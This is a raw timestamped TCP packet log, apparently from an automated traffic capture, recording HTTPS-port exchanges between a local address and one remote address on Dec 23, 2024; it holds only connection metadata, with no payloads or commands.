                                                                                                Dec 23, 2024 09:09:05.733659983 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:05.781275988 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:05.851869106 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:05.895334959 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.797956944 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.797986031 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.798188925 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:06.798212051 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.798331022 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:06.808336973 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.808474064 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:06.816771984 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.816854000 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:06.916718960 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.916857004 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:06.991950035 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.992072105 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.000264883 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.000333071 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.017036915 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.017147064 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.033541918 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.033662081 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.042227983 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.042349100 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.058969021 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.059072971 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.070571899 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.070715904 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.080950022 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.081012964 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.181529999 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.181619883 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.189824104 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.189970016 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.195406914 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.195513964 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.204251051 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.204334974 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.213011980 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.213114977 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.217272997 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.217375994 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.225584030 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.225670099 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.233577013 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.233741999 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.237842083 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.238030910 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.246378899 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.246474028 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.250063896 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.254390001 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.254455090 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.254467010 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.254559040 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.262340069 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.262557983 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.270567894 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.270632982 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.274740934 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.274796009 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.282820940 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.282897949 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.373586893 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.373703003 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.379116058 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.379277945 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.382354021 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.382603884 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.388600111 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.388665915 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.394423008 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.394546032 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.395433903 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.395447016 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.403055906 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.403129101 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.403142929 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.405975103 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.406095982 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.406104088 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.406439066 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.411461115 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.411545992 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.416922092 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.417087078 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.430398941 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.430408001 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.430444956 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.430546999 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.430565119 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.430602074 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.435995102 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.436247110 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.436254978 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.438494921 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.438632011 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.438638926 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.443758965 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.443864107 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.443871021 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.443936110 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.448903084 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.449116945 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.451757908 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.451843023 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.457072020 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.457241058 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.461174011 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.461283922 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.466389894 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.466478109 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.469225883 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.469356060 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.471995115 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.477144957 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.477297068 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.477308035 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.477401018 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.480000019 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.480071068 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.565818071 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.566006899 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.569495916 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.569575071 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.571610928 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.571687937 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.575531006 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.575685024 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.579436064 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.579513073 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.581455946 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.581525087 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.585098982 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.585167885 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.588846922 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.588944912 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.590753078 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.590919971 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.594284058 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.594427109 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.597723007 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.597887039 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.599773884 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.599858046 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.603226900 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.603306055 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.606343031 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.606410980 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.606443882 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.609635115 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.609754086 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.609769106 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.609826088 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.613042116 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.613156080 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.614788055 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.614980936 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.618371010 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.618496895 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.621519089 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.621648073 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.623908043 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.624077082 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.627201080 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.627259970 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.629148960 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.629306078 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.632229090 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.632297993 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.635505915 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.635597944 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.637315989 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.637444973 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.643904924 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.644042015 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.647372007 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.647689104 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.650446892 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.650526047 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.652292967 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.652636051 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.656769037 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.656891108 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.657180071 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.657283068 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.757839918 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.758038998 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.759643078 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.759737968 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.761082888 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.761137009 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.763482094 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.763576984 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.766091108 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.766144037 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.767477989 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.767529011 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.769872904 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.769928932 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.772394896 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.772495985 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.773722887 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.773777962 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.776103020 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.776287079 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.778326035 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.778851986 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.779659033 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.779807091 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.781987906 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.782315969 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.784177065 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.784246922 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.785460949 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.785548925 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.787849903 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.788064003 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.789060116 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.790337086 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.790407896 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.790420055 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.790462017 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.792624950 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.793106079 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.794821024 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.794883013 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.796582937 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.796706915 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.798791885 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.798868895 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.800180912 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.800236940 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.812580109 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.812699080 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.814613104 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.814713001 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.816308975 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.816421032 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.817972898 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.818053961 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.836555004 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.836623907 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.837913036 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.838004112 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.840272903 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.840370893 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.842379093 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.842463017 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.843664885 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.843739033 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.845974922 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.846082926 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.950032949 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.950607061 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.950668097 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.950685024 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.950803041 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.952745914 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.952948093 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.954889059 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.954972982 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.956160069 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.956240892 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.958503008 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.958630085 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.960726023 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.960789919 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.963125944 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.963205099 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.964343071 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.964446068 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.966500998 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.966620922 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.968832016 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.968909979 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.970130920 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.970292091 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.972398996 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.972573042 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.974735022 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.974817038 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.975975990 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.976062059 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.978348970 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.978476048 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.980606079 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.980685949 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.981046915 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.981087923 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.983022928 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.983095884 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.985172033 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.985276937 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.986849070 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.986998081 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.988327980 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.988404036 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.990535975 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.990845919 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.992912054 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.992975950 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.995172024 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.995238066 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.996393919 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.996457100 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.998495102 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.998560905 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.028431892 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.028516054 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.030018091 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.030076027 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.032218933 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.032479048 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.033698082 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.033768892 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.035912991 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.035976887 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.038014889 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.038094044 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.142585039 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.142673016 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.142903090 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.143027067 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.145221949 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.145351887 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.146503925 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.146570921 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.148703098 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.148801088 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.151026964 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.151082039 CET49738443192.168.2.45.253.86.15
